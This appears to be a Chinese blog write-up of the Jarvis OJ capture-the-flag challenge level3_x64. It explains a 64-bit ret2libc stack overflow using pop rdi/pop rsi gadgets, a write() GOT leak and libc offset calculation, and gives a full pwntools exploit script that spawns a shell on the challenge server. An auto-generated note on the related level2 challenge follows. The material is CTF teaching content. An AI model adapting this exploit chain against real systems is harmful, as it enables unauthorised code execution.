jarvis oj level3_x64

本文详细解析了Level3_x64的漏洞利用过程,通过分析寄存器操作和gdb调试技巧,展示了如何构造payload以实现远程代码执行。文章深入探讨了rdi、rsi寄存器的利用,以及如何通过write函数泄露地址信息,最终利用system函数执行/bin/sh命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。
先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。

0x00000000004006b3 : pop rdi ; ret
0x00000000004006b1 : pop rsi ; pop r15 ; ret

根据网上wp,gdb在read处下断,验证rdx在此时等于0x200,只要大于8就可以。对于这点,我是这么理解的:我们是在vul函数里写入数据的,读取数据时调用了read(0, &buf, 0x200uLL),将rdx赋值0x200,后面直接就溢出到我们构造的栈了,没有修改rdx寄存器的值了,所以不用修改。

此时遇到地址问题,卡了两天,发现应该是虚拟机的问题,装了系统。记一些命令:
查命令地址:readelf -a libc-2.19.so | grep " system@"
查字符串地质:strings -a -t x libc-2.19.so | grep "/bin/sh"

回到题目,那么直接构造payload1='a'*0x88+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_r15_addr)+p64(write_got)+"junkjunk"+p64(write_plt)+p64(vul_addr)
recv得到服务器函数地址write_addr。同理offset=write_addr-libc.symbols[‘write’]。
脚本:

from pwn import * 
#context.log_level="debug" 
elf=ELF("level3_x64") 
write_plt=elf.symbols["write"] 
write_got=elf.got["write"] 
vul_addr=elf.symbols['vulnerable_function']

p=remote("pwn2.jarvisoj.com",9883) 
p.recvuntil("Input:\n") 
pop_rdi_addr=0x00000000004006b3   #0x00000000004006b3 : pop rdi ; ret
pop_rsi_r15_addr=0x00000000004006b1      #0x00000000004006b1 : pop rsi ; pop r15 ; ret

payload1='a'*0x88+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_r15_addr)+p64(write_got)+"junkjunk"+p64(write_plt)+p64(vul_addr)
p.sendline(payload1) 
t=p.recv(8)
write_addr=u64(t[0:8]) 
print "write_addr="+hex(write_addr) 

libc=ELF("libc-2.19.so") 
offset=write_addr-libc.symbols["write"] 
sys_addr=offset+libc.symbols["system"] 
bin_addr=offset+libc.search("/bin/sh").next()
payload2='a'*0x88+p64(pop_rdi_addr)+p64(bin_addr)+p64(sys_addr)+"ret-addr"
p.sendline(payload2) 
p.interactive()
p.close()
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这个题目的解题思路的说明。 具体来说,在这个题目中,程序调用了system函数,并且存在/bin/sh字符串。通过对return address进行覆盖,可以将程序的控制流引导到system函数,并将/bin/sh字符串作为参数传递给它,从而获取Shell。其中,payload中的一些关键地址和字符串的具体值需要根据具体题目的情况来确定。 需要注意的是,这个题目的具体实现可能与上述引用中的代码有所不同,因此需要根据实际情况进行调整。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [jarvisoj_level2_x64](https://blog.youkuaiyun.com/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [jarvisoj_level2](https://blog.youkuaiyun.com/m0_55086916/article/details/128089924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值